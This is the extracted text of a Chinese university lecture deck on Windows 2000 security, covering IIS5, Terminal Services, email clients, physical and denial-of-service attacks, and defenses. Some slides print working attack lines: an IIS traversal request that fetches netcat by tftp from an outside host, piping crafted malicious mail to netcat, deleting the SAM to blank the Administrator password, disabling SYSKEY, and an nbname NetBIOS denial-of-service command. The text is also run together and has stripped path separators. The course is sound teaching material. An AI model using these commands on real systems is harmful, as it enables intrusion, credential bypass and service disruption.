1、Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,*,Win2k系统安全(2),胡建斌,北京大学网络与信息安全研究室,E-mail:hjbin,录,IIS5安全,终端服务器安全,Microsoft Internet 客户端
2、安全,物理攻击,拒绝服务攻击,安全功效和工具,第2页,IIS5安全,第3页,IIS5基础基本HTTP,HTTP:基于文本无状态文件传输协议,映射到该系统磁盘一个实际目录上,如c:inetpubwwwrootfiles,对于服务器而言则形成以下请求:,GET/files/index.html HTTP/1.0,若该文件存在,则服务器会向客户端推送该文件并在客户端浏览器上显示;不然会有各种错误代码,第4页,IIS5基础CGI,CGI:Common Gateway Interface,运行在服务器上应用程序,能针对每个请求生成动态内容,扩展了Web功效,调用CGI,Server Pages,ISAP
3、I:Interface Server Application Programming Interface,调用ASP,var1&var2,第6页,HTTP攻击伎俩,使用./进行文件系统遍历,URL十六进制编码,第7页,使用./进行文件系统遍历,2F 2E 2E 2F 2E 2E 2F winnt/repair/,sam,能防止入侵检测系统检测,或能够造成应用程序错误处理输入,第10页,IIS5缓冲区溢出,IPP缓冲区溢出,索引服务ISAPI扩展缓冲区溢出,Code Red蠕虫,ida/idq缓冲区溢出,FrontPage 服务器扩展缓冲区溢出,第11页,安全对策,在系统驱动器之外驱动器上安装W
4、eb文件夹,Web服务器所在卷应使用NTFS并慎重设置ACL,移动、删除或更名可能被利用可执行文件:cacls,xcacls,在服务器Write和Execute ACL中删除Everyone和Users Group,掌握对日志中攻击标志分析,第12页,将文件写入Web服务器,如在目标机上建立tftp服务器,然后上载文件:,GET/scripts/.%c0%af./winnt/system32/tftp.exe?“-i”+192.168.234.31+GET+nc.exe c:nc.exe HTTP/1.0,将netcat写入到C:,因为默认情况下全部用户对C:含有写权限,如将目标机器上cmd.
5、exe更名为cmdl.exe,GET/scripts/.%c0%af./winnt/system32/cmd.exe?+copy+c:winntsystem32cmd.exe+c:cmdl.exe HTTP/1.0,其它自动上载工具:如unicodeloader等,第13页,经过IIS5提升权限,经过InProcesslsapiApps利用RevertToSelf,安装MS01-026补丁能够处理,第14页,源代码泄漏攻击,起因,IIS中程序缺点,低劣Web编程技术,常见漏洞,+.htr(ism.dll),Webhits(webhits.dll),Translate:f(WebDAV,http
6、ext.dll),WebDAV目录列表(httpext.dll),第15页,Web服务器安全评定工具,Stealth HTTP Scanner,SSLProxy,www.obdev.at/Products,Achilles,www.digizen-Template来对其进行配置,第17页,Web服务器安全忠言,在系统卷之外建立一个独立卷来存放Web根目录,Web服务器所在卷应使用NTFS文件系统,明确设置ACL,删除Everyone、Users和其它非特权组所在目录上写文件和执行文件权限,不要将私有数据保留在ASP文件或包含有文件中,停顿Administration Web站点,删除IISAd
7、min和IISHelp虚拟目录以及它们对应真实目录,第18页,目 录,IIS5安全,终端服务器安全,Microsoft Internet 客户端安全,物理攻击,拒绝服务攻击,安全功效和工具,第19页,终端服务器安全,第20页,TS,Windows 提供了交互式图形化远程shell,称为终端服务(Terminal Service,TS),适合用于远程管理或应用程序共享,引用说法,“Windows 终端服务使你能够从各种设备上,经过几乎任何类型网络连接远程基于Windows 服务器,并在其上远程执行应用程序”,第21页,TS,TS紧密集成在操作系统内部,无偿提供远程管理模式(最多有两个同时连接会语
8、以及一个控制台),TS 能够在你和服务器之间提供不一样认证和加密方法。对Windows 来说,终端服务器正在逐步成为与UNIX世界中SSH一样主要图形化产品,第22页,TS代价,在本节中,我们将从安全角度来考查TS基本功效、怎样识别和枚举TS、处理不合理TS实现问题、已知针对TS攻击,以及在网络环境中保护和管理TS基本知识,第23页,TS组件,服务器,远程桌面协议(Remote Desktop Protocol,RDP),客户端,第24页,TS服务器,TS集成在全部Windows 服务器中,经过控制面板中Windows组件功效能够很轻易地启用和禁用,在以管理模式安装时,服务器是标准组件;看成为
9、远程应用程序服务器时,它需要额外授权费用和架构,服务器默认监听端口为TCP 3389(稍后将会介绍自行指定端口是很轻易),第25页,远程桌面协议(RDP),在客户端和服务器之间数据传输是经过Microsoft基于TCP远程桌面协议(RDP-5)进行,RDP提供了三层加密以确保点对点数据传输安全性:40、56或128位RC4,与Windows NT版本RDP-4相比,Windows 提供了更多基本功效,能够在大多数网络环境中高效使用,第26页,客户端,经过MS安装程序(MSI)软件包安装独立16位或32位可执行文件,终端服务高级客户端(Terminal Services Advanced Ali
10、ent,TSAC),基于Win32ActiveX控件,能够在Web页面中使用,MMC管理单元,尽管它们相互之间存在显著区分,但各种不一样客户端都用完全相同方法来实现RDP。所以,尽管它们看起来似乎不一样,但全部TS客户端在与服务器进行对话时都以完全相同方式进行操作,第27页,修改TS监听端口服务器端,经过修改下面注册表键值,TS默认端口能够重新指定,HKLMSystemCurrentControlSetControl,Terminal Server WinStationsRDP-Tcp,键值:,PortNumber REG_DWORD=3389,第28页,修改TS监听端口客户端,第一步是在TS
11、客户端连接管理器中与目标主机建立连接,一旦创建了一个连接之后,选定该连接并从File菜单中选择Export,将全部配置设置保留到以一个CNS为扩展名文本文件中去,使用文本编辑器打开这个文件,将Server Port修改为在服务器上指定端口,以下例所表示(自定义连接端口为7777),第29页,修改TS监听端口客户端,CorpTermServ,WinPosStr=0,2,0,0,941,639,Expand=1,Smooth Scrolling=0,Shadow Bitmap Enabled=1,Dedicated Terminal=0,Server Port=7777,Enable Mouse=
12、1,etc.,第30页,识别和查找TS,3389端口扫描,TSProbe,TSEnum,第31页,攻击TS,密码猜测攻击,用户权限提升,畸形RDP拒绝服务攻击,第32页,密码猜测攻击-TSGrinder.exe,TS登录等价于真正交互式登录,所以对真正Administrator账户是不能设置锁定阈值。这意味着在启用了TS服务情况下,对密码猜测攻击来说,当地Administrator账户是一个最易受攻击目标,Tim Mullen开发了TSGrinder工具,它能够经过TS对当地Administrator账户进行字典攻击,第33页,密码猜测攻击-TSGrinder.exe,TSGrinder使用T
13、SActiveX控件来进行攻击。尽管这个ActiveX控件经过特殊设计能够拒绝对密码方法脚本访问,但经过C+中vtable绑定依然能够访问ImsTscNonScriptable接口方法。这允许为该控件编写自定义接口,于是攻击者就能够对Administrator账户进行密码猜测,直至猜测出密码,上提供下载,第34页,密码猜测攻击防御,推荐将当地Administrator账户更名,防御TS密码猜测攻击另一个有趣方法是为Windows登录窗口制作一个自定义法律申明,经过添加或编辑以下注册表键值就能够实现:,HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWin
14、Logon,第35页,用户权限提升,推荐实现Windows Resource Kit中一些关键功效,其中最主要是,“Appsec”能够使管理员能够限制用户只能运行特定应用程序,这能够减小攻击者在获取当地用户访问之后进行权限提升攻击危险,第36页,IME远程Root获取,输入法编辑器(Input Method Editor,IME)漏洞,这个漏洞造成能够不用提供任何凭据就能经过TS认证,IME用来将标准101键键盘映射到某种语言中大量可用字符,比如日语、汉字和韩国语都需要IME。即使IME通常在当地用户上下文中进行正常操作,但登录时,IME却在SYSTEM上下文中运行。这使得经过远程服务器登录屏
15、幕运行精心设计命令成为可能,第37页,IME对策,只有简体汉字版系统或在初始安装过程中安装了简体汉字IME系统才会有这个漏洞,Microsoft公布公告MS00-069和补丁能够为全部受影响版本处理这个问题,第38页,畸形RDP拒绝服务,年1月,Yoichi Ubukata和Yoshihiro Kawabata发觉了RDP中一个漏洞,这个漏洞可能造成拒绝服务情况出现。假如攻击者发送一个畸形报文,它将使RDP瘫痪。这种攻击会造成当前正在进行全部工作丢失,而且需要重新开启系统才能恢复服务,Microsoft公布了一个补丁(MS01-006),经过修改终端服务器服务使它正确地处理数据,从而消除这个漏
16、洞,第39页,目 录,IIS5安全,终端服务器安全,Microsoft Internet 客户端安全,物理攻击,拒绝服务攻击,安全功效和工具,第40页,Microsoft Internet客户端安全,第41页,攻击类型,缓冲区溢出,可被用来执行任意代码而无需与用户进行任何交互,经过坑骗、强制或暗中执行命令,使用户运行由攻击者预先选择可执行内容。这种方法有以下一些改变:,巧妙伪装、看起来无害电子邮件附件,嵌入在HTML Web页面或电子邮件中可执行内容,活动内容技术漏洞造成非法代码执行,ActiveX控件,尤其是那些标识有“能够在脚本中安全使用”控件,Java虚拟机程序缺点(Brown Orif
17、ice),第42页,攻击类型,访问脚本/自动化接口,比如Outlook地址簿蠕虫,写当地文件,通常是在可执行目录中;经常经过暂时目录或缓存位置不适当泄露发生。一旦在当地写入文件,它就能够执行并运行在当地计算机安全区域,上下文中,从而是完全受到信任,读取当地文件,比如经过HTML跨帧导航问题或使用IFRAME。这种技术一个常见结果是从Web浏览器cookie中获取用户密码数据,调用客户端出站连接,第43页,实现 Internet客户端攻击,第44页,恶意Web页面,客户端一个最常见形式是在Internet上布署恶意Web服务器,存放经过精心设计内容,用来诱骗用户数据,这种方法有效性取决于提升恶意
18、Web站点/页面访问量,这通常是经过电子邮件或新闻组/列表文章来进行,第45页,恶意E-mail,因为HTML功效多样性(嵌入小程序或控件、活动脚本、跨帧浏览、内联帧、cookie解析等等),HTML电子邮件成为理想攻击媒介,因为接收端漏洞造成这么问题,Microsoft即使备受指责,然而经过Outlook或Outlook Express(OE)这么程序发送恶意编写HTML却十分困难。这些图形化电子邮件客户端不允许对邮件消息内容进行直接操作,而为实现攻击目标却需要这么做,假如要在Windows上模拟这种命令行功效,能够经过命令行提醒符直接向简单邮件传输协议(Simple Mail Transf
19、er Protocol,SMTP)服务器手动发送消息。最正确方法是将适当SMTP命令和数据写入到一个文本文件中,然后经过管道输入给netcat,第46页,Email Hacking,首先,将所需SMTP命令和消息数据写入到一个文件中,helo,mail from:,rcpt to:,data,subject:Read this!,Importance:high,MIME-Version:1.0,Content-Type:text/html;charset=us-ascii,Content-Transfer-Encoding:7bit,Hello World!,.,quit,第47页,Email
20、 Hacking,然后在命令行中将这个文件经过管道传递给netcat,而netcat则应该指向适当邮件服务器SMTP监听端口25,比如:,C:,type malicious.txt|nc-vv 25,第48页,Email Hacking,恶意攻击者通常会选择一些提供无限制SMTP消息中继不引人注意邮件服务器,而且会尽可能隐藏他们自己源IP地址,这么就不可能经过邮件服务器日志来追查到他们,这么“开放式SMTP中继”通常被垃圾邮件所利用,在Usenet讨论或mail-abuse.org上经常能够找到这么服务器,第49页,Email Hacking,假如希望随HTML格式消息发送一个附件,则必须向消
21、息中添加另一个MIME部分,依据MIME规范(RFC 2045-49)用Base64格式对附件进行编码,用以自动完成这项工作最正确工具是John G.Myersmpack。mpack能够自动添加正确MIME头,这么它输出就能够直接发送给SMTP服务器,下面例子使用mpack对一个名为plant.txt文件进行编码,输出到文件plant.mim中。可选-s参数用以指定消息主题行,C:mpack-s Nasty-gram-o plant.mim plant.txt,第50页,Email Hacking,下面将MIME部分插入到现有HTML格式消息中去,对前面malicious.txt来说,使用“C
22、ontent-Type:”一行中自定义MIME边界来划分该消息。MIME边界以两个连字符开始,结束边界以两个连字符为后缀。还要注意嵌套“multipart/alternative”MIME部分(boundary2),这么Outlook接收者就能够正确地对HTML消息正文进行解码,一定要十分注意换行位置,因为MIME解析依据它们位置有着很大不一样。这个消息主要性被设置为high(高),这是诱使受害者上当受骗一个伎俩,第51页,Email Hacking,第52页,Email Hacking,使用管道将这个文件输入给netcat,并发送给开放SMTP服务器,就能够向hapless发送一封HTML格
23、式消息,并包含附件plant.txt,要更加好地了解多部分消息中MIME边界,参考RFC 2046第5.1.1节。在Outlook Express中对收到消息进行研究,也能够深入了解其格式,单击Properties|Details|Message Source就能够查看原始数据(Outlook不允许查看全部原始SMTP数据),第53页,缓冲区溢出,假如在天天使用软件电子邮件客户端中存在缓冲区溢出漏洞,那么问题就很可怕了。在漏洞得到修正之前,任何使用存在问题软件人都将成为目标,年7月18日;Underground Security Systems Research(USSR)公布了GMT令牌缓冲
24、区溢出漏洞,Outlook和Outlook Express(OE)用户随之发觉了这一点。经过将GMT令牌放在邮件消息日期字段中并写入一个超长值,Outlook和OE就会在POP3和IMAP4下载这么消息时瓦解。假如能够发送精心设计日期字段,攻击者选定程序就能够封装在GMT值中并执行,Outlook用户需要预览、阅读、回复或转发这么消息;OE用户简单地打开含有该消息文件夹,在消息处理时就会自动发生OE就会永久性地瓦解,除非去除邮箱,第54页,Outlook/OE vCard缓冲区溢出,这个问题最早由Joel Moses发觉,经过打开特定字段中含有大量文本数据vCards,就能够利用Interne
25、t Explorer中缓冲区溢出,vCards是1996年创造一个电子名片格式,1998年进入RFC,vCards以.vcf为文件扩展名。因为在读取vCards时必须解析大量数据字段,所以它们成为缓冲区溢出攻击最正确目标,第55页,Outlook/OE vCard缓冲区溢出,尽管受害者必须显式地运行vCard,但因为它是一个方便个人数据交换格式,所以大多数人都不会有任何犹豫,在默认情况下,Outlook会直接从邮件附件运行vCards而不对用户进行提醒,除非安装了Office安全更新。在直接打开磁盘上.vcf文件时,不会出现提醒,第56页,Outlook/OE vCard缓冲区溢出,vCard
26、s采取非常简单ASCII结构,下面例子是一个名为John Doe.vcfvCard(为了简明起见,删除了一些可选字段):,第57页,Outlook/OE vCard缓冲区溢出,假如可选BDAY(生日)字段超出55个字符,运行它就会造成Outlook终止并溢出,含有大量文本数据EMAIL字段也会造成一样结果,而在N(姓名)字段中填入大量文本数据会造成Outlook占用99%系统CPU资源,主要问题似乎在于Outlook地址簿,它在试图从vCard导入超长字段时发生阻塞。用户将存在问题vCard复制到他们Outlook/OE联络人文件夹中,经过Windows资源管理器,或经过嵌入在Web页面或电子
27、邮件消息中链接打开它时,也会发生问题,第58页,其它缓冲区溢出,Windows媒体播放器.asx缓冲区溢出,Georgi Guninski和Richard Smith发觉ActiveX“Safe for Scripting(脚本安全)”问题,Access数据库实例化,IE 5中执行VBA代码,第59页,写当地文件,将文件写入当地磁盘,假如能够写入任意文件然后又能够执行它们,那么麻烦就大了。假如文件已经写入到磁盘上,那么只有文件系统ACL和它们与用户账户权限交集能够确定哪些能够被执行而哪些不能,所以只要过了第一关,第二步就很轻易了。,这种攻击一个聪明变种是识别磁盘上能够可靠地写入数据静态位置比如
28、,Internet暂时缓存文件名称和位置是能够预测。这使得攻击者能够实现“选定文件内容”攻击,在文件里面他们能够精心设计恶意脚本或是其它提交给Internet客户端指令,方便能够写入到这些可预测位置之一。一旦完成了这一步,那么经过IFRAME或其它技术从已知位置执行这些脚本就很轻易了,第60页,执行被写入暂时Internet缓存.chm文件,Georgi Guninski第28号公告描述了这个漏洞。它包括到4个基本步骤,它们都是在IE或Outlook/OE中装载HTML时进行:,1.使用一些HTML代码,向IEInternet暂时文件缓存中写入一系列相同经过特殊设计已编译HTML帮助文件(.c
29、hm),2.从第一份HTML文档中,装载第二份HTML文档,第二份文档位于另一台服务器上,该服务器名称与存放父文档服务器名称不一样,3.识别Internet暂时缓存文件夹位置,4.在查点出缓存文件夹中执行.chm文件,第61页,通用对策,仔细配置出站网关访问控制,阻塞除由企业策略显著允许通信之外全部通信。客户端攻击最可怕一个可能就是调用与恶意服务器之间出站连接在不安全协议上,比如telnet或SMB,不要在主要服务器上读取邮件或浏览Web,不要在主要服务器上安装Microsoft Office,在浏览Web和读取邮件时,尽可能使用非特权用户身份,而不要用Administrator,第62页,通
30、用对策,坚持标准不关键点击不可信链接或查看不可信电子邮件附件,最好将其删除,一定要及时升级Internet客户端软件。当前,使用Windows更新站点来自动检测和安装你需要补丁(Microsoft计划在年夏天推出一个新工具,以帮助用户确定他们IE/OE和Outlook需要安装哪些补丁)。在编写本书时,IE 5.5是Microsoft关键Internet客户端最新版本,而且Service Pack 1也已经公布。在IE中,检验Help|About以查看已经安装了哪些补丁,而且确保你正在使用128位加密强度,第63页,通用对策,不要忘了及时到Office更新站点上对Office进行更新。尤其,确保
31、你已经安装了Outlook电子邮件安全更新,适当设置IE Security Zone,包含禁用Restricted Site区域中全部功效,然后配置Outlook/OE使用该区域读取电子邮件,将安全策略中Windows LAN Manager认证级别设置为Send NTLMv2 Response Only。这能够降低对SMB认证进行窃听攻击危险(但不能阻止恶意服务器和MITM攻击),第64页,通用对策,禁用Windows telnet客户端NTLM认证(在命令行中执行telnet命令,然后输入unset ntlm,然后用quit退出)。这能够防止在对telnet:/链接进行反应时NTLM凭据在
32、网络上传输,在全部Office应用程序Tools|Macro|Security中将宏安全性设置为High(高)。这有利于防止Office文档中恶意宏脚本进行攻击,第65页,通用对策,在客户端和邮件服务器上,及时更新防病毒标识数据库,布署基于网关和邮件服务器过滤系统,剔除Web页面和电子邮件中恶意内容,假如这些提醒没能使你感到安全,那么不要再使用Microsoft Internet客户端(假如你运行Windows,那么实际上这是不可能),第66页,目 录,IIS5安全,终端服务器安全,Microsoft Internet 客户端安全,物理攻击,拒绝服务攻击,安全功效和工具,第67页,物理攻击,第
33、68页,物理攻击,假如入侵者能够不受限制地在物理上访问一台Windows 系统,那么他们怎样进行攻击呢?,本节将从物理角度探讨攻击者怎样从Windows 获取数据,通常方法是引导到另外操作系统并在离线状态下对系统属性进行编辑,第69页,对SAM进行离线攻击,破解通常依赖于获取NT/密码数据库安全账户管理器(Security Accounts Manager,SAM)文件,经过离线攻击,SAM内容也能够被坏人获取,只需引导到另一个操作系统,然后将SAM复制到可移动媒体或网络共享中,首先介绍一些经典离线攻击技术,然后分析这些攻击对EFS潜在影响。最终,讨论EFS攻击一个例子,它不需要在离线状态下访
34、问系统,第70页,经过删除SAM废除Administrator密码,经过在系统处于离线状态时删除SAM文件,然后就能够在系统重新开启后以空密码登录Administrator账户。这种方法同时也删除了目标系统上全部现有用户账户,但与磁盘上主要数据相比,攻击者并不考虑这一点,这种攻击有各种实现方式,但最直接方法是制作一张可引导DOS系统软盘,并将Sysinternalntfsdospro复制到软盘上。然后这张软盘就能够用来将目标系统引导到DOS,第71页,经过删除SAM废除Administrator密码,假如目标系统使用FAT或FAT32,那么只需输入以下命令就能够删除SAM文件:,A:del c
35、:winntsystem32configsam,假如目标系统使用NTFS文件系统,那么能够使用ntfsdospro将NTFS卷装载到DOS中,然后使用相同命令来删除SAM,第72页,经过删除SAM废除Administrator密码,当系统稍后重新开启时,Windows 将重新创建一个默认SAM文件,它含有Administrator账户,而且密码为空。只需使用这个账户和密码登录,就能够取得对系统全方面控制,这里需要注意是,删除SAM并不会影响Windows 域控制器,因为它们没有把密码散列保留在SAM中。然而,Grace和Bartlett文章指出了一个方法,经过在域控制器上安装另一份Window
36、s,就能够取得基本相同效果,第73页,经过使用chntpw对SAM进行散列注入,假如你希望使用更为成熟物理攻击方法,不想破坏掉系统中全部账户,能够使用一张Linux引导软盘和Petter Nordahl-Hagenchntpw,在离线状态将密码散列注入到SAM中,即使在应用了SYSKEY时,或即使选择了用密码来保护SYSKEY或将它保留在软盘上选项,注入依然能够奏效!,第74页,经过使用chntpw对SAM进行散列注入,Petter说明了怎样将SYSKEY关闭。更糟是,他发觉攻击者并不需要这么做只需将旧、未经SYSKEY处理散列直接注入到SAM中,在重新开启后,它就会自动被转换为SYSKEY散
37、列,第75页,关闭SYSKEY方法,1.,将HKLMSystemCurrentControlSetControlLsaSecureBoot设置为0以禁用SYSKEY(这个键可能取值为:0禁用;1不受保护密钥保留在注册表中;2密钥保留在注册表中,受密码保护;3密钥保留在软盘上),2.将二进制结构HKLMSAMDomainsAccountF中一个特殊标志位修改为以前SecureBoot相同模式。在系统处于运行状态时,这个主键是不能访问,3.在Windows 中,HKLMsecurityPolicyPolSecretEncryptionKey 主键也需要被修改为与以前两个主键相同值,第76页,经过使
38、用chntpw对SAM进行散列注入,依据Petter说法,在NT 4 SP6之前系统上只修改前两个值中一个会造成在完全引导之后出现一个警告,指出SAM和系统设置之间不一致性,SYSKEY会被重新启用。而在Windows 上,在重新开启之后,这3个键值之间不一致似乎直接被重置为最可能值,第77页,目 录,IIS5安全,终端服务器安全,Microsoft Internet 客户端安全,物理攻击,拒绝服务攻击,安全功效和工具,第78页,拒绝服务攻击,第79页,拒绝服务(Denial of Service,DoS)攻击并不是以窃取用户账户或系统数据为直接目标,而是使系统拒绝正当用户对系统服务访问,Do
39、S能够有很各种形式,比如经过耗尽系统资源,使正当用户访问站点请求失败,或者经过一个精心制作与RFC不兼容报文造成操作系统挂起,在一些情况下,假如攻击需要目标计算机重新开启才能完成,DoS实际上被用来辅助对系统入侵,第80页,TCP连接淹没,TCP连接淹没(connect flood)方法有时也被称为进程表攻击(process table attack)。顾名思义,这种方法是与目标之间建立尽可能多TCP连接,直到目标因为资源耗尽而不能再为请求提供服务为止,TCP连接淹没比曾经流行TCP SYN淹没攻击更为先进,因为它实际上完成了3次握手过程,使目标计算机上全部套接字都处于ESTABLISHED状
40、态。最终,全部套接字都被耗尽,目标就不能再接收任何新连接,而不论它还含有多少可用内存、带宽、CPU时间等,第81页,TCP连接淹没,这确实是一个非常有破坏力攻击,而且只要攻击者能够访问任一个监听服务(比如TCP 80端口上WWW服务),那么几乎没有什么防御方法,攻击工具:,Portfuck,第82页,应用程序服务级DoS攻击,IISWebDAV,telnet服务器,第83页,基于LANDoS攻击,在面向LANWindows DoS攻击中,大多数都与NetBIOS相关。NetBIOS传统问题是它依赖于不可靠、无认证服务。它提供了一个IP地址与NetBIOS名称间相互映射方法,很轻易被伪装,所以任
41、何能够连接到当地网络中人都能够经过声称已经注册了其它正当客户端NetBIOS名称或者向特定主机发送“名称释放”报文,从而使正当客户端断开网络,收到这种报文客户端将会完全丢失加入NetBIOS网络能力,包含访问文件共享、Windows域认证等等,第84页,基于LANDoS攻击,下面是使用nbname对一台主机进行DoS攻击例子。在Windows 上,你必须首先禁用TCP/IP上NetBIOS,以防止它与真正NBNS服务发生冲突,因为NBNS服务通常会大量地使用UDP端口137。然后,运行nbname(使用你要攻击主机IP地址代替这里192.168.234.222):,C:nbname/astat
42、 192.168.234.222/conflict,第85页,基于LANDoS攻击,其中/ASTAT参数用于从目标获取远程适配器状态,/CONFLICT参数向响应适配器状态请求计算机远程名称表格中全部名称发送名称释放报文,经过使用/QUERY name IP/CONFLICT/DENY name_or_file参数,攻击者能够对整个网络进行DoS攻击,第86页,基于LANDoS攻击,在受害主机上,可能会出现以下症状:,网络连接时断时续,网络邻居(Network Neighborhood)等工具不能正常工作,net send命令不能正常工作,受影响服务器不能认证域登录,不能访问共享资源和基础Ne
43、tBIOS服务,比如NetBIOS名称解析,nbtstat 命令会将NetBIOS名称服务状态显示为Conflict(冲突),第87页,Windows DDoS僵尸,在年2月之后,“僵尸”(zombie)这个词开始流行起来,用以代指那些被用来攻击受害者无辜DDoS客户端,Tribe Flood Network(TFN),Trinoo,Stacheldraht,TFN2K,WinTrinoo,第88页,防御DoS联合你ISP,联络你Internet服务供给商(ISP),问询他们能够为预防你连接收到DoS攻击而提供何种办法(假如有)。几乎全部Internet连接都要经过ISP,不论你DoS防御策略
44、是多么牢靠,假如ISP连接断开或是饱和,你办法就没有任何意义,第89页,防御DoS联合你ISP,在站点受到攻击时,你ISP能够做出什么反应。假如可能话,将你ISP网络操作中心(NOC)联络信息放在手边,记住,跟踪找到攻击发起者是很困难,但假如你ISP肯合作而且能够访问你和攻击者之间路由器,这也是可能实现,第90页,防御DoS配置边界路由器,经过适当配置路由器,能够相当有效地减轻DoS攻击危害,强烈推荐读者参考“Cisco对分布式拒绝服务攻击(DDoS)策略”。该文章讨论了Cisco IOS配置,比如验证单播逆向路径、过滤RFC 1918私有地址、应用进出口过滤、速率限制、ICMP和UDP过滤等
45、,对当前Internet环境来说,这些是基本惯用配置,录,IIS5安全,终端服务器安全,Microsoft Internet 客户端安全,物理攻击,拒绝服务攻击,安全功效和工具,第95页,安全模板和安全配置分析,组策略,IPSec,Kerberos,加密文件系统(Encrypted File System,EFS),Runas,Windows文件保护(Windows File Protection,WFP),第96页,安全模板、安全配置和分析,安全模板(Security Template)、安全配置和分析(Security Configuration and Analysis)是在Window
46、s 环境中布署安全体系时所能使用最能够节约时间工具,尤其是在与组策略联合使用时,安全模板是Windows 中与安全相关设置结构化列表,经过点击鼠标就能够编辑和应用,而无需去寻找和配置本书中已经讨论过大量分散安全设置。另外,这些模板文件能够与系统当前设置进行比较,从而显示出一致和不一致配置(即分析功效),第97页,安全模板、安全配置和分析,经过打开一个空白Microsoft管理控制台(MMC),然后添加安全模板、安全配置和分析管理单元,就能够使用这两项工具,第98页,第99页,第100页,组策略,组策略(Group Policy)是Windows 提供功效最强大新工具之一,它作用已经远远超出了安
47、全设置范围,组策略是Windows 集中化管理配置管理体系。它是由组策略对象(Group Policy Object,GPO)实现,GPO定义了能够被应用于(或链接到)用户和计算机配置参数。GPO有两种类型:当地GPO(LGPO)和活动目录GPO(ADGPO),第101页,组策略,LGPO保留在%systemroot%system32GroupPolicy目录中,由以下一些文件组成:gpt.ini,管理模板(.adm),安全配置文件(.pol),以及登录/注销和开启/关机脚本,ADGPO存放在%systemroot%system32sysvol Policies目录中,活动目录中System|
48、Policy容器中也保留了指向每个ADGPO指针,LGPO只作用于当地计算机。ADGPO则能够应用于站点(site)、域(domain)、组织单位(Organizational Unit,OU),而且多个GPO能够链接到同一个站点、域或OU,第102页,组策略,与安全相关GPO设置集中在Computer ConfigurationWin-dows SettingsSecurity Settings结点之下,Security Settings(安全策略)结点定义了账户策略、审核策略、事件日志、公钥和IPSec策略,因为这些参数能够在站点、域、OU级别上进行设置,大型网络环境中安全管理工作负担就能
49、够减轻很多。更加好是,安全模板能够被导入到一个GPO中。所以,组策略是安全地配置大型Windows 域最正确方法,第103页,将安全模板导入组策略,第104页,第105页,IPSec,IPSec定义了一个用以获取IP数据报端到端安全机制,包含认证、机密性、完整性和防回放服务,而且无需中间设备来了解该协议,第106页,IPSec?,IPSec过滤功效是操作系统内建功效,所以不论Windows 被布署在哪里,它都是有效,有知识网络安全管理员能够很轻易地对过滤器进行修改,而且只需一次简单鼠标点击或批处理脚本就能够应用(不需要重新开启系统),IPSec过滤器优于旧TCP/IP安全功效,因为它不需要重新
50、开启,而且能够真正地阻塞ICMP通信(关于TCP/IP安全有一个极少有些人知道事实,那就是即使在界面中已经指定,但ICMP并没有真正地被阻塞),第107页,Kerberos,Windows 提供了旧版本Windows使用传统NTLM认证架构一个替换方案Kerberos v5,它是一个非常优异标准,在专业和学术安全界都被认为是非常安全,Kerberos比LM和NTLM协议要安全很多,因为它不会受到LM窃听攻击影响。不幸是,与使用安全策略中LM认证级别设置能够强制使用更安全NTLM协议不一样,我们没有方法强制使用Kerberos认证,当前,Kerberos只在可能情况下使用,不然,Windows
浙ICP备2021020529号-1 | 浙B2-20240490 
